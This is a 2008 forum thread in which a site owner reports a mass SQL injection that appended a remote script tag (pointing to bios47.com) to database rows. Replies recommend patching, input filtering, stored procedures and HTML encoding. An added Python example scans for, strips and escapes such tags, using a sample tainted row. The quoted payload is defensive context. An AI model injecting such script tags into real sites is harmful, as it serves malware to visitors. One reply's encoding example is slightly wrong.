-
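Urgent!!! Our SQL Server was hacked. In several tables, someone appended <script src=http://www.bios47.com/b.js></script> to the end of the data. When a web page loads the data, the page transfers very slowly, and afterwards an alarm goes off; it may attack your machine. Has any expert here run into this problem? How can we prevent being hacked???? Thanks everyone, please give me some hints.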
-shinning(dudu);
2008-6-26
(#4523805@0)
-
Perhaps it is SQL injection. You need to do at least two things: 1. apply the latest patches to the server; 2. filter all user input, HTML input field values, including hidden fields. Use POST instead of GET, and so on...
-canadiantire(轮胎 - Bona fide Crm);
2008-6-26
(#4523808@0)
-
thanks
-shinning(dudu);
2008-6-26
(#4523845@0)
-
Did you use ad-hoc SQL queries or stored procs? Better to use stored procs.
-newdriger(P0kerFan);
2008-6-26
(#4523950@0)
-
It’s not a database problem. It’s your web application’s problem. To prevent script attacks, you should use HTML encoding (using special character combinations for HTML and script tags). For example, use &lt; for <, use &lt; for >. This way, it shows the tags but does not interpret the content as script code or HTML content.
-deep_blue(BLUE);
2008-6-26
(#4524026@0)
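The measures suggested in the replies above (treating user input as data rather than SQL text, and HTML-encoding stored values on output), together with a scan for rows that already carry an appended script tag, as an added example that is not code from any poster in this thread. It assumes Python with an in-memory SQLite database standing in for SQL Server so it runs offline; the table, column and function names and the sample rows are hypothetical and constructed.

```python
import html
import re
import sqlite3

# Matches a script element anywhere in a stored text value.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.IGNORECASE | re.DOTALL)

def make_db():
    """Build a constructed sample table; one row has a script tag appended to its data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO products (title) VALUES (?)", [
        ("Winter tire",),
        ("Road bike<script src=http://injected.example/b.js></script>",),
    ])
    return db

def find_tainted_rows(db):
    """Return ids of rows whose text column contains a script tag."""
    rows = db.execute("SELECT id, title FROM products").fetchall()
    return [row_id for row_id, title in rows if SCRIPT_TAG.search(title)]

def clean_tainted_rows(db):
    """Strip script tags from stored values; the UPDATE uses bound parameters."""
    cleaned = 0
    for row_id, title in db.execute("SELECT id, title FROM products").fetchall():
        stripped = SCRIPT_TAG.sub("", title)
        if stripped != title:
            db.execute("UPDATE products SET title = ? WHERE id = ?", (stripped, row_id))
            cleaned += 1
    return cleaned

def search(db, user_input):
    """Parameterized query: user input is bound as data, never spliced into the SQL text."""
    return db.execute("SELECT title FROM products WHERE title = ?", (user_input,)).fetchall()

def render(title):
    """HTML-encode on output so markup in stored data is displayed, not executed."""
    return "<td>" + html.escape(title) + "</td>"

if __name__ == "__main__":
    db = make_db()
    print("tainted ids:", find_tainted_rows(db))
    print("rendered:", render(search(db, "Winter tire")[0][0]))
    print("rows cleaned:", clean_tainted_rows(db))
```

Cleaning the rows only removes the symptom; the same tag will reappear until every query that takes user input is parameterized.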